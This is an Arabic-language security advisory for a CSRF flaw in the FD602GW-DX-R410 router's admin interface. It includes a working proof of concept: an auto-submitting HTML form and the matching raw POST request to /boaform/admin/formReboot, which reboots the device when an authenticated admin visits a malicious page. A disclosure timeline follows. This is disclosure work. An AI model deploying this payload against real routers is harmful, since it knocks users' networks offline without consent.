
ثغرة CSRF في جهاز التوجيه FD602GW-DX-R410 تسمح للمهاجمين عن بُعد بإعادة تشغيل الجهاز عبر طلب POST مخصص إلى /boaform/admin/formReboot عندما يكون المسؤول مُوثقًا.
إثبات المفهوم ونشرة أمنية لثغرة تزوير الطلب عبر المواقع (CSRF) في واجهة الإدارة لجهاز التوجيه الليفي FD602GW-DX-R410 (البرنامج الثابت V2.2.14). توضح النشرة الأثر، ناقل الهجوم، والتوصيات للعلاج.
ثغرة CSRF في جهاز التوجيه FD602GW-DX-R410 تسمح للمهاجمين عن بُعد بإعادة تشغيل الجهاز عبر طلب POST مخصص إلى /boaform/admin/formReboot عندما يكون المسؤول مصادقًا.
تم اكتشاف ثغرة تزوير الطلب عبر المواقع (CSRF) في وحدة التحكم الإدارية المستندة إلى الويب لجهاز التوجيه الليفي FD602GW-DX-R410 (البرنامج الثابت V2.2.14). يسمح نقطة النهاية /boaform/admin/formReboot بطلبات POST لتشغيل إعادة تشغيل كاملة للجهاز دون رموز CSRF أو التحقق من المصدر. إذا زار مسؤول مصادق صفحة ضارة، يمكن إعادة تشغيل جهاز التوجيه عن بُعد دون موافقته.
/boaform/admin/formReboot<html>
<!-- CSRF PoC - generated by Burp Suite Pro -->
<body>
<form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
<input type="hidden" name="postSecurityFlag" value="+65535" />
<input type="submit" value="Submit" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
postSecurityFlag=+65535
HTTP 200 OK؛ يعاد تشغيل جهاز التوجيه فوراً.
| التاريخ | الإجراء |
|---|---|
| يونيو 2025 | تم اكتشاف الثغرة |
| يونيو 2025 | محاولة الإفصاح المسؤول (لا رد) |
| يوليو 2025 | طلب CVE ID من MITRE |
| يوليو 2025 | إعداد النشرة وانتظار النشر |
| سبتمبر 2025 | تخصيص CVE، النشرة منشورة للعموم |
تم تقديم هذه النشرة لأغراض تعليمية والتوعية الأمنية. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام. تم إجراء جميع الاختبارات في بيئة خاضعة للتحكم.